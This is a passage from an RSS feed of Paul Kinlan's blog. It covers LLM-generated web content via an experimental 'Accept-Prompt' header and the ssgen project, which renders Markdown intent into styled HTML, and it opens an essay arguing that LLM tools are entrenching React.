<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>curl https://ssgen.paulkinlan-ea.deno.net/carousel -H <span style="color:#e6db74">&#34;Accept: image/jpeg&#34;</span>
</span></span></code></pre></div><p>Below are the first renderings I got from the demo (image, webm)</p>
<figure><img src="/images/hyper-content-test-image.jpeg"
    alt="literal image of the content"><figcaption>
      <p>literal image of the content</p>
    </figcaption>
</figure>

<figure>
  <video src='/images/hyper-content-test.webm' style="width:100%" controls></video>
  <figcaption>
    <p>literal video of the content</p>
  </figcaption>
</figure>
<p>I still need to tweak the prompts because right now it will return a literal video of a carousel that meets the requirements, but this literal interpretation of the content made me think about what the user might want.</p>
<p>I also make heavy use of Gems in Gemini and instructions in ChatGPT. It made me think if there is ever a world where we could personalise every response from the sites to the explicit needs of the user more. How might I want my preferences to be communicated to a page?</p>
<p>There&rsquo;s a couple of ways to think about it, maybe the browser makes a request to the resource, load it and then processes it. Or maybe we pass some notion of our preferences to the server and have the content be negotiated along with our preference. We already express some preference through <code>Accept-Language</code> , what if we could do more? Could we have a way to pass user preference by a prompt?</p>
<pre tabindex="0"><code>Accept-Prompt: I am a person who likes kittens. Please make sure the output has a kitten influence. Please ensure that all units are metric, I hate imperial measurements (like really, wtf?). Please ensure that you output in dark-mode.
</code></pre><p>I thought it might be fun to test this out:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>curl https://ssgen.paulkinlan-ea.deno.net/carousel -H <span style="color:#e6db74">&#34;Accept-Prompt: I am a person who likes kittens. Please make sure the output has a kitten influence.&#34;</span>
</span></span></code></pre></div><figure><img src="/images/hyper-content-kittens.png"
    alt="literal kitten influence"><figcaption>
      <p>literal kitten influence</p>
    </figcaption>
</figure>

<p>Having a &ldquo;prompt&rdquo; on every request is <strong>very unlikely to happen</strong>; a prompt can contain very personal data and this means that it shouldn&rsquo;t be sent on the first request. We saw from things like the Topics API that this wasn&rsquo;t something the ecosystem thought was acceptable. User opt-in though via a client-hint (and only when there is strict CSP or limited access to hardware)&hellip;? Maybe that is interesting.</p>
<p>I don&rsquo;t know where the web is going to go in this regard and I don&rsquo;t think what is in this post is viable <em>today</em> given the performance of LLMs, but when the <a href="/latency/">latency</a> is solved and we have ways to protect users and site owners from prompt exfiltration and impersonation, I do think we should be looking at how User Agents can act more on the behalf of the user, especially in a way that is outside of the UA is being an &ldquo;autonomous agent&rdquo; and we are going to have to deal with the tension that publishers and site owners want their exact output to be what is presented to the user, and the user, well, likely wants it <em>their</em> way and that Chat apps give them that ability.</p>
<p>The thing is, the web is a hypermedia platform and it can be far more flexible than we treat it today. I think we have the opportunity to experiment at the forefront of the platform (client and server) and keep the web as <em>the</em> platform for all computing interaction.</p>
]]></content:encoded></item><item><title>headless stopgap</title><link>https://aifoc.us/headless-stopgap/</link><pubDate>Sun, 23 Nov 2025 10:00:00 +0000</pubDate><author>paul@aifoc.us (Paul Kinlan)</author><guid>https://aifoc.us/headless-stopgap/</guid><description>&lt;p>I remember my early days building for the web. We had no separation of concerns. We used &lt;code>&amp;lt;font&amp;gt;&lt;/code> and &lt;code>&amp;lt;center&amp;gt;&lt;/code> tags, transparent &lt;code>spacer.gif&lt;/code>s, and complex table layouts to force our content into a shape. Presentation and content were a single, messy soup.&lt;/p>
&lt;p>My first encounter with CSS in Netscape Navigator 4 was a mind-blowing moment. It was the first time I was confronted with the &lt;em>idea&lt;/em> that you could (and should) separate the document&amp;rsquo;s structure (HTML) from its presentation (CSS).&lt;/p></description><content:encoded><![CDATA[<p>I remember my early days building for the web. We had no separation of concerns. We used <code>&lt;font&gt;</code> and <code>&lt;center&gt;</code> tags, transparent <code>spacer.gif</code>s, and complex table layouts to force our content into a shape. Presentation and content were a single, messy soup.</p>
<p>My first encounter with CSS in Netscape Navigator 4 was a mind-blowing moment. It was the first time I was confronted with the <em>idea</em> that you could (and should) separate the document&rsquo;s structure (HTML) from its presentation (CSS).</p>
<p>This concept was cemented for the entire industry by the CSS Zen Garden. It was the ultimate demo: one single HTML file, hundreds of completely different visual designs. This idea, that content and presentation are two different things, has stuck with me ever since.</p>
<p>For the past decade, we&rsquo;ve been running with this idea. Headless CMSs are the logical conclusion of that CSS Zen Garden-era thinking. We put our pure content in an API and make our presentation layer (a React app, usually) completely separate. We thought we&rsquo;d finally achieved the ultimate separation.</p>
<p>But it&rsquo;s a trap. We&rsquo;ve just relocated the coupling. Instead of being locked to a WordPress template loop, we&rsquo;re locked to <code>contentful.getEntry()</code> loops. We&rsquo;re still manually mapping <code>fields.heroTitle</code> to <code>&lt;h1&gt;</code> and <code>fields.heroImage.url</code> to <code>&lt;img&gt;</code>. This isn&rsquo;t freedom, it&rsquo;s a 1:1 mapping to a rigid JSON schema instead of a flexible template.</p>
<p>Something has been gnawing away at me because I don&rsquo;t think we&rsquo;re at our final form of content management by a long way. As I explored in &ldquo;<a href="https://aifoc.us/whither-cms/">Whither CMS?</a>&rdquo;, for years &ldquo;normal people&rdquo; and local businesses have fled to walled gardens like Facebook, not because they <em>want</em> to, but because the alternative is too hard. When I moved to North Wales, I saw this firsthand. They know their content, their goals, and their intent (name, address, pictures, booking forms), but the barriers of design, cost, and technical skills are too high.</p>
<p>That post also highlighted a key gap: the data shows popular CMSs (like WordPress) are dominant in the web&rsquo;s massive &ldquo;long tail,&rdquo; but not where people actually spend their time. We&rsquo;re still failing to provide tools for the <em>vast majority</em> of people who just want a simple, independent presence.</p>
<p>I do think with the introduction of Large Language Models we are on the verge of the <em>next</em> great separation. The first was <code>(Content + Style)</code> -&gt; <code>(Content) + (Style)</code> with CSS and CMS systems. The new one is <code>(Rigid Components)</code> -&gt; <code>(Pure Intent)</code> that will enable us to move from &ldquo;structured data&rdquo; to &ldquo;intent.&rdquo;</p>
<p>It seems that LLMs will finally make this possible by acting as the bridge, allowing anyone to simply <em>describe</em> what they want, starting with their content (the most important part) and <strong>progressively layering</strong> on style <em>and</em> functionality.</p>
<p>The &ldquo;block editor&rdquo; (Gutenberg, Notion, etc.) was a step in the right direction, but it&rsquo;s still a &ldquo;what you see is what you get&rdquo; system that mashes content and presentation into a messy HTML blob. You can&rsquo;t easily change the markup of every &ldquo;Two Column&rdquo; block on your site.</p>
<p>The new model requires a hard separation of &ldquo;Content&rdquo; and &ldquo;Chrome.&rdquo;</p>
<ul>
<li><strong>Content:</strong> The text, the image URL, the list items. This is sacred and <em>must not be changed</em> by the LLM. In my experimental <a href="https://github.com/PaulKinlan/ssgen">ssgen</a> project, this is just raw Markdown.</li>
<li><strong>Chrome:</strong> The <code>&lt;div&gt;</code>s, the <code>grid</code>, the <code>shadow-lg</code>, the <code>rounded-xl</code>. This is the <em>shell</em> that presents the content. It is disposable and should be generated.</li>
</ul>
<p>The LLM&rsquo;s role is to act as a just-in-time &ldquo;chrome generator.&rdquo; It reads the pure content (<code># My Title</code>) and wraps it in the <em>appropriate</em> presentation (<code>&lt;div class=&quot;hero&quot;&gt;&lt;h1 class=&quot;text-4xl...&quot;&gt;My Title&lt;/h1&gt;&lt;/div&gt;</code>) based on context, leaving the content itself pristine.</p>
<p>Right now, we ask people to style with <code>tailwind.config.js</code>, <code>_variables.css</code>, and create massive design system libraries. A new model could be &ldquo;Intent.&rdquo; Instead of <em>coding</em> the style and the intent, we <em>describe</em> it. The LLM acts as the style-transfer engine.</p>
<p>My <code>ssgen</code> experiment shows that this is possible in three ways:</p>
<ol>
<li><strong>Textual Intent (The Brand File):</strong> We give the LLM a simple &ldquo;brand.md&rdquo; file.
<em>&ldquo;Our brand is professional and minimalist. Use a dark blue primary color (#0a2351), a serious serif font for headings, and generous white space.&rdquo;</em></li>
<li><strong>Visual Intent (The Screenshot):</strong> We give the LLM an image.
<em>&ldquo;Make it look like this.&rdquo;</em></li>
<li><strong>Functional Intent:</strong> Describe what you need to do and <a href="/hypermedia/">hypermedia</a> can make it possible.</li>
</ol>
<p>The LLM uses this &ldquo;intent&rdquo; to inform how it builds the &ldquo;chrome&rdquo;, enabling us to bridge the gap between the author and the final code.</p>
<p>But how can we think about describing intent while enabling ease of authorship? One of the things that I loved about HTML was its ability to render even if the input HTML was malformed in some way. No <code>&lt;/p&gt;</code>, not a problem. What if we could extend that flexibility even further into describing what you want?</p>
<p>If as an author I could describe that I want a <code>&lt;contact-form&gt;</code> and what I want it to achieve even if I don&rsquo;t know HTML, that could be pretty powerful.</p>
<p>Maybe I could write something like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-Markdown" data-lang="Markdown"><span style="display:flex;"><span># Contact me for availability
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">contact-form</span>&gt;
</span></span><span style="display:flex;"><span>mail to: paul@aifoc.us
</span></span><span style="display:flex;"><span>I need the users name, email address, message and date they would like an appointment
</span></span><span style="display:flex;"><span>&lt;/<span style="color:#f92672">contact-form</span>&gt;
</span></span></code></pre></div><p>Should produce something like:
<figure><img src="/images/contact-form.png"
    alt="ssgen&lsquo;ed form"><figcaption>
      <p><code>ssgen</code>&lsquo;ed form</p>
    </figcaption>
</figure>
</p>
<p>Oh - <a href="https://ssgen.paulkinlan-ea.deno.net/contact-form">wait it does</a> | <a href="https://github.com/PaulKinlan/ssgen/blob/main/content/contact-form.md">Code</a>.</p>
<p>This brings us to what I think is the most powerful idea. Back in 2016, I wrote a post called &ldquo;<a href="https://paul.kinlan.me/custom-elements-ecosystem/">Custom Elements: an ecosystem. Still being worked out</a>.&rdquo; The dream was that semantic, custom HTML elements could become a universal <em>interchange format</em>. An author should be able to write <code>&lt;share-button&gt;</code> or <code>&lt;aspect-image&gt;</code>, and the <em>developer</em> or <em>platform</em> would provide the best <em>implementation</em> for that context (whether it was Polymer, AMP, or just vanilla JS). The author&rsquo;s HTML would be stable, even if the underlying tech changed.</p>
<p>Yes, that future did not happen, but as the post warned, framework ecosystems exploded, and each one built its <em>own</em> proprietary, prefixed component model (<code>&lt;amp-img&gt;</code>, <code>&lt;iron-image&gt;</code>). This fragmented the composability of the platform. We didn&rsquo;t get an ecosystem; we got a set of high-walled gardens that locked developers in. A React <code>&lt;ProductCard&gt;</code> is almost useless in a Vue app. However, if you look at how people use frameworks like React, <code>&lt;ProductCard&gt;</code> and <code>&lt;ContactForm&gt;</code> are surprisingly good, descriptive definitions of the intent of what is being created.</p>
<p>Can we use LLMs to finally deliver on that original vision of semantic, functional HTML elements that are <em>implementation agnostic</em>?</p>
<p>I think there&rsquo;s a massive opportunity to cement the web as the place for all content and I think the LLM is the missing piece that can finally deliver on the concept I set out in 2016 to bind an implementation to an author&rsquo;s intent.</p>
<p>Consider the two roles:</p>
<ol>
<li><strong>The Author&rsquo;s Job:</strong> Write pure semantic <em>intent</em>.</li>
<li><strong>The LLM&rsquo;s Job:</strong> Act as the &ldquo;intelligent renderer&rdquo; (e.g, <code>ssgen</code>). It sees these tags, understands their <em>function</em> and <em>contract</em>, and generates the <em>entire, correct, and secure implementation</em> (the <code>&lt;iframe&gt;</code>, the <code>&lt;form&gt;</code>, the Stripe.js <code>&lt;script&gt;</code>) on the fly, <em>using the brand guidelines</em>.</li>
</ol>
<p>I think this is decoupling that we should explore more. Authors don&rsquo;t need to know HTML, JavaScript, or even what framework is being used. They just declare their high-level intent, and the LLM handles the implementation, which might help us to break the framework lock-in for good.</p>
<p>Consider this example of functional elements that <code>ssgen</code> can already generate:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-Markdown" data-lang="Markdown"><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span>prompt: element.md
</span></span><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>This is a test page testing how elements being automatically generated.
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span># Google Map and Pin
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">google-map</span>&gt;&lt;<span style="color:#f92672">pin-location</span> <span style="color:#a6e22e">city</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;Ruthin&#34;</span>/&gt;&lt;/<span style="color:#f92672">google-map</span>&gt;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span># Google Font
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">google-font</span> <span style="color:#a6e22e">font</span><span style="color:#f92672">=</span><span style="color:#e6db74">Lobster</span> <span style="color:#a6e22e">size</span><span style="color:#f92672">=</span><span style="color:#e6db74">30pt</span>&gt;Hello World&lt;/<span style="color:#f92672">google-font</span>&gt;
</span></span></code></pre></div><figure><img src="/images/elements-ssgen.png"
    alt="Google Map and Google fonts generated by LLM"><figcaption>
      <p>Google Map and Google fonts generated by LLM</p>
    </figcaption>
</figure>

<p>Demo: <a href="https://ssgen.paulkinlan-ea.deno.net/element">View Element Demo</a>
Code: <a href="https://raw.githubusercontent.com/PaulKinlan/ssgen/refs/heads/main/content/element.md">View on GitHub</a></p>
<p>These elements were entirely made up as a way to explain what I wanted in the page. The LLM understood the intent of what I wanted and generated the correct code to make it happen.</p>
<p>I could imagine a world where you could write:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-html" data-lang="html"><span style="display:flex;"><span>Welcome to my site about travel! Here is my trip to the tower of London:
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">google-map</span> <span style="color:#a6e22e">location</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;Tower of London&#34;</span> <span style="color:#a6e22e">zoom</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;14&#34;</span> /&gt;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>You can book tickets using here:
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">checkout-button</span> <span style="color:#a6e22e">item</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;prod_123xyz&#34;</span> <span style="color:#a6e22e">price</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;19.99&#34;</span> <span style="color:#a6e22e">currency</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;GBP&#34;</span> /&gt;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>If you want more information about my travels, sign up to my newsletter:
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">newsletter-signup</span> <span style="color:#a6e22e">form-id</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;my-campaign-id&#34;</span> /&gt;
</span></span></code></pre></div><p>I think this is pretty fun. Exploring this model further, we can create more complex elements.</p>
<p>How about a carousel of images?</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-Markdown" data-lang="Markdown"><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span>prompt: element.md
</span></span><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>This is a test page to test elements that could work by being generated
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>in this demo we are going to create a carousel of images.
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">carousel</span>&gt;
</span></span><span style="display:flex;"><span>  Img url=https://picsum.photos/200/300 link_text=paul kinlan link=https://paul.kinlan.me
</span></span><span style="display:flex;"><span>  Img url=https://picsum.photos/200/300 link_text=web dev link=https://web.dev
</span></span><span style="display:flex;"><span>  Img url=https://picsum.photos/200/300 link=https://developer.chrome.com link_text=&#34;chrome.&#34; ; open the link in a new window
</span></span><span style="display:flex;"><span>&lt;/<span style="color:#f92672">carousel</span>&gt;
</span></span></code></pre></div><figure><img src="/images/carousel-ssgen.png"
    alt="Carousel generated by LLM"><figcaption>
      <p>Carousel generated by LLM</p>
    </figcaption>
</figure>

<p>Demo: <a href="https://ssgen.paulkinlan-ea.deno.net/carousel">View Carousel Demo</a>
Code: <a href="https://github.com/PaulKinlan/ssgen/blob/main/content/carousel.md">View on GitHub</a></p>
<p>The LLM understood the intent of what I wanted and generated a working carousel with navigation buttons, image links, and accessibility features.</p>
<p>Finally, consider a full portfolio page where I provide the content and a screenshot of the style I want:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-Markdown" data-lang="Markdown"><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span>prompt: element.md
</span></span><span style="display:flex;"><span>style:
</span></span><span style="display:flex;"><span>  image: images/screen.png
</span></span><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span># Portfolio Showcase
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">## My Creative Work
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span>Explore a collection of my recent projects and designs.
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">## Featured Projects
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">### Project Alpha
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span>A revolutionary web application that changed the industry.
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">### Project Beta
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span>Beautiful design meets functionality in this mobile app.
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">### Project Gamma
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span>Enterprise solution delivering results at scale.
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">## About Me
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span>I&#39;m a designer and developer passionate about creating beautiful, functional digital experiences.
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">## Contact
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span>Let&#39;s work together on your next project!
</span></span></code></pre></div><p>Demo: <a href="https://ssgen.paulkinlan-ea.deno.net/style-image-example">View Style Transfer Demo</a>
Code: <a href="https://github.com/PaulKinlan/ssgen/blob/main/content/style-image-example.md">View on GitHub</a></p>
<figure><img src="/images/style-ssgen.png"
    alt="Site generated by LLM with image as source"><figcaption>
      <p>Site generated by LLM with image as source</p>
    </figcaption>
</figure>

<p>As more and more people get used engaging with LLMs, I think we can start to see a new model for content management and site generation emerge.</p>
<p>The new workflow is simple:</p>
<ol>
<li><strong>You write semantic content</strong> (Markdown + custom functional tags).</li>
<li><strong>You provide stylistic intent</strong> (a brand file or a screenshot, or even CSS file).</li>
<li><strong>An LLM Renderer (<code>ssgen</code>!)</strong> generates the complete, functional, and on-brand site.</li>
</ol>
<p>I like the idea that a CMS can become a simple text file (Markdown) that anyone can write, and the &ldquo;renderer&rdquo; is an LLM-powered engine that can understand both the content and the intent of the author.</p>
<p>There are a number of challenges that I can see you already raise:</p>
<p>The first two (latency and deterministic output) are hard-stops for many if you think about how today&rsquo;s web is built to ensure that the experience works the same across all browsers and devices for all users. <a href="/latency/">Latency</a> is starting to <a href="https://groq.com">be</a> <a href="https://cerebras.ai">solved</a>. The non-determinism through? This might actually be a feature.</p>
<p>If we embrace this non-determinism, we are now in a world where every navigation to a page is an opportunity to generate the best possible experience for that <em>specific</em> user, on their <em>specific</em> device, for their <em>specific</em> browser, no matter their context.</p>
<p>By understanding the user&rsquo;s context, we can also be a lot more progressive. Progressive enhancement starts with a functional baseline and adds features based on the browser&rsquo;s capabilities. By sending the HTTP headers on the request through to the LLM, we can influence the output of the LLM to produce code that is the best possible experience for the browser (e.g., Chrome, Safari or Firefox) and the platform (e.g., desktop or mobile). This makes API documentation and best practices even more important and critical to be in the model&rsquo;s training data or the tool&rsquo;s context. As we&rsquo;ve seen with Progressive Enhancement, it&rsquo;s still a hurdle to get businesses over that the site doesn&rsquo;t work exactly the same everywhere.</p>
<p>The real big challenge that I see is: Security and the validation of the intent. How do we ensure that the generated code is safe, secure, and does not expose vulnerabilities? We need to build robust &ldquo;element handlers&rdquo; that can validate and sanitize the generated code before it goes live, or even force the pages to run in highly sandboxed and CSP-restricted environments.
CSS is (in my eyes) the correct layering for the technology that is HTML. It got us out of spacer.gif hell and allowed us to separate content from presentation.</p>
<p>Headless CMSs were a step in the right direction because they made content management more flexible, but they are just a stopgap. The real future is about separating content from presentation and functionality at a higher level of abstraction <a href="https://blog.almaer.com/english-will-become-the-most-popular-development-language-in-6-years/">using the user&rsquo;s language</a>, and using LLMs to generate the &ldquo;chrome&rdquo; based on the author&rsquo;s intent and if we follow this model I think we can get people out of the vendor lock-in that we see with prescriptive frameworks and platforms and make the web the best and easiest place for everyone to publish their content.</p>
]]></content:encoded></item><item><title>dead framework theory</title><link>https://aifoc.us/dead-framework-theory/</link><pubDate>Sun, 12 Oct 2025 23:00:00 +0000</pubDate><author>paul@aifoc.us (Paul Kinlan)</author><guid>https://aifoc.us/dead-framework-theory/</guid><description>&lt;p>&lt;em>These are my opinions and are ruminations on what might be happening as more and more developers use LLMs and Frameworks to build on the web.&lt;/em>&lt;/p>
&lt;p>In October last year I wrote &amp;ldquo;&lt;a href="https://paul.kinlan.me/will-we-care-about-frameworks-in-the-future/">will developers care about frameworks in the future?&lt;/a>&amp;rdquo; predicting that LLMs would abstract away framework choice. I was wrong—or at least, wrong about the timeline.&lt;/p>
&lt;p>The reality is more interesting and more permanent: &lt;strong>React isn&amp;rsquo;t competing with other frameworks anymore. React has become the platform.&lt;/strong> And if you&amp;rsquo;re building a new framework, library or browser feature today, you need to understand that you&amp;rsquo;re not just competing with React—you&amp;rsquo;re competing against a self-reinforcing feedback loop between LLM training data, system prompts, and developer output that makes displacing React functionally impossible.&lt;/p></description><content:encoded><![CDATA[<p><em>These are my opinions and are ruminations on what might be happening as more and more developers use LLMs and Frameworks to build on the web.</em></p>
<p>In October last year I wrote &ldquo;<a href="https://paul.kinlan.me/will-we-care-about-frameworks-in-the-future/">will developers care about frameworks in the future?</a>&rdquo; predicting that LLMs would abstract away framework choice. I was wrong—or at least, wrong about the timeline.</p>
<p>The reality is more interesting and more permanent: <strong>React isn&rsquo;t competing with other frameworks anymore. React has become the platform.</strong> And if you&rsquo;re building a new framework, library or browser feature today, you need to understand that you&rsquo;re not just competing with React—you&rsquo;re competing against a self-reinforcing feedback loop between LLM training data, system prompts, and developer output that makes displacing React functionally impossible.</p>
<p>If you look at what Replit, Bolt, and similar tools are doing, they&rsquo;re not trying to abstract away frameworks—they&rsquo;re <a href="https://github.com/x1xhlol/system-prompts-and-models-of-ai-tools/blob/7e9f6102c7d164dfdbfca3bfd66f3d8ad5c0b2cc/Open%20Source%20prompts/Bolt/Prompt.txt#L275">explicitly hardcoding React into their system prompts</a>. They have to. If you&rsquo;re building a tool today to attract developers, you need to give them code they can maintain. And &ldquo;code developers can maintain&rdquo; now means &ldquo;React&rdquo; for the vast majority of web developers.</p>
<p><a href="https://trends.builtwith.com/javascript/React">According to builtwith.com, there were +13m sites outside of the top 1m deployed with React in the last 12 months</a>. Look at these curves:</p>
<figure><img src="/images/react-builtwith-all-time.png"
    alt="React usage over time"><figcaption>
      <p>React usage over time</p>
    </figcaption>
</figure>

<figure><img src="/images/react-builtwith-12mo.png"
    alt="React usage over the last 12 months"><figcaption>
      <p>React usage over the last 12 months</p>
    </figcaption>
</figure>

<p>However, looking at <a href="https://httparchive.org/reports/techreport/tech?tech=ALL#adoption">HTTP Archive</a>, it tells a different story. React usage has stalled at 1.2 million mobile origins on mobile vs 55 million origins as reported by Builtwith.</p>
<figure><img src="/images/react-http-archive-all.png"
    alt="HTTP Archive. React usage over the last 6 months"><figcaption>
      <p>HTTP Archive. React usage over the last 6 months</p>
    </figcaption>
</figure>

<p>The dataset sizes are vastly different. HTTP Archive looks over <a href="/images/http-archive-origins-over-time.png">some 12-16 million origins</a>, while <a href="https://trends.builtwith.com/javascript/React">Builtwith is reportedly looking</a> at some <a href="/images/built-with-coverage.png">414 million <em>root domains</em></a>. Sites also don&rsquo;t get into HTTP Archive unless there is some amount of usage and many sites in Builtwith might be parked domains or sites that are not actively being used.</p>
<p>Looking at the top 1m, the detection rate is more aligned: 140k vs 160k.</p>
<figure><img src="/images/react-http-archive-top-1m.png"
    alt="HTTP Archive. React usage in the top 1m"><figcaption>
      <p>HTTP Archive. React usage in the top 1m</p>
    </figcaption>
</figure>

<figure><img src="/images/react-builtwith-top-1m.png"
    alt="Builtwith React usage in the top 1m"><figcaption>
      <p>Builtwith React usage in the top 1m</p>
    </figcaption>
</figure>

<p>We&rsquo;re looking at about 12-18% of sites in the top 1m. Take all these numbers with a pinch of salt. The detection can be broken, the datasets are different sizes and the definitions of what is being measured are different. But the trends feel undeniable: React&rsquo;s growth continues while competitors <a href="/images/builtwith-angular-12mo.png">like Angular, sadly stagnate</a>.</p>
<p>So what has driven the uptick in React sites? My read of the data suggests LLM tools over the last 12-18 months are preferring to output React code.</p>
<p>Look at token growth on OpenRouter. Programming tools are <a href="https://aifoc.us/token-slinging">burning through billions of tokens a day</a> via just one gateway. The curves look similar:</p>
<figure><img src="/images/open-router-tokens-oct.png"
    alt="OpenRouter token usage over time"><figcaption>
      <p>OpenRouter token usage over time</p>
    </figcaption>
</figure>

<p>Correlation is not causation, and only the tool creators see the full picture as tokens flow through their systems. But the timing is striking: massive token growth coinciding with massive React deployment growth.</p>
<p>The models and the tools are preferring the tools that developers are already using, and it&rsquo;s driving a self-reinforcing cycle of adoption. If you are launching a new API or tool today, you need to consider how it will be adopted by the ecosystem and how to get it into the training corpus of the LLMs.</p>
<p>We have two loops of feedback in play here:</p>
<ol>
<li>React dominates the existing web (~13M+ new sites in 12 months)</li>
<li>LLMs train on the existing web</li>
<li>LLMs output React by default</li>
<li>New sites built with LLMs use React</li>
<li>More React sites exist for future training</li>
<li>Go to step 2</li>
</ol>
<p>And&hellip;</p>
<ol>
<li>React dominates the developer ecosystem</li>
<li>IDEs and tools that developers preferntially output React</li>
<li>Tools ask LLMs to output React by default</li>
<li>New sites built are using React</li>
<li>More React sites exist to increase demand for tools to output React</li>
<li>Go to step 1</li>
</ol>
<p>I don&rsquo;t actually know if this is bad or good. We&rsquo;re getting more sites on the web and they&rsquo;re all pretty high quality. But it does create barriers for new frameworks, tools and web platform features that we need to understand. Specifically when:</p>
<ol>
<li>Your framework isn&rsquo;t in the training data because it&rsquo;s new</li>
<li>Tool creators hardcode React because that&rsquo;s what developers know today</li>
<li>Developers expect React output because that&rsquo;s what works</li>
<li>Companies won&rsquo;t use your framework if their developers can&rsquo;t maintain it</li>
<li>React has thousands of libraries; you have dozens</li>
</ol>
<p>If you launch a new framework, library or browser feature today, even if it&rsquo;s technically superior, you need to:</p>
<ul>
<li>Get into LLM training data (12-18 month lag minimum)</li>
<li>Convince tool creators to modify system prompts (requires existing adoption)</li>
<li>Build a comprehensive library ecosystem (years of development)</li>
<li>Overcome developer inertia and get developers to ask for it</li>
</ul>
<p>By the time you&rsquo;ve done step 1, the ecosystem using React has generated another 10M+ sites. You might flip that order, and do a massive campaign to get developer mind share, and supplement it with paid integrations in to the library ecosystem. We might even see new business models where framework and library authors pay tooling providers to include their framework in system prompts. But even then, you&rsquo;re fighting against entrenched patterns in both React libraries AND LLM training data.</p>
<p>This isn&rsquo;t about React being the best tool or that it&rsquo;s Model is good for LLMs (I don&rsquo;t see any evidence there at all). It&rsquo;s about React being past the point where network effects make alternatives viable.</p>
<p>Here&rsquo;s what brought this home for me: Last week I used Claude to build a Chrome Extension using Chrome&rsquo;s built-in <code>prompt</code> API. Claude dutifully wrote the entire extension, but used <code>self.ai.languageModel</code>—the API from 6 months ago. The current API is <code>LanguageModel.create()</code>, but that wasn&rsquo;t in the training corpus.</p>
<p>Add in the fact that it can take years of <a href="https://web.dev/blog/interop-2025">Interop</a> work to get a feature to the point it becomes &ldquo;<a href="https://developer.mozilla.org/en-US/docs/Glossary/Baseline/Compatibility#:~:text=Features%20listed%20as%20newly%20available%20work%20in%20at%20least%20the%20latest%20stable%20version%20of%20each%20of%20the%20Baseline%20browsers%2C%20but%20may%20not%20work%20with%20older%20browsers%20and%20devices.">Baseline newly-available</a>&rdquo; and then another 30 months for it to reach a point where it&rsquo;s &ldquo;<a href="https://developer.mozilla.org/en-US/docs/Glossary/Baseline/Compatibility#:~:text=Features%20listed%20as%20widely%20available%20have%20a%20consistent%20history%20of%20support%20in%20each%20of%20the%20Baseline%20browsers%20for%20at%20least%202.5%20years.">Baseline widely-available</a>&rdquo;. By that time, the ecosystem has moved on, and the feature is competing against entrenched patterns in both React libraries AND LLM training data.</p>
<p>This is the new reality: <strong>If it&rsquo;s not in the LLM training data, it doesn&rsquo;t exist.</strong> Not for 12-18 months, at least not until the next model training cycle and not until enough examples exist in the wild to statistically matter.</p>
<p>Now apply this to frameworks:</p>
<ul>
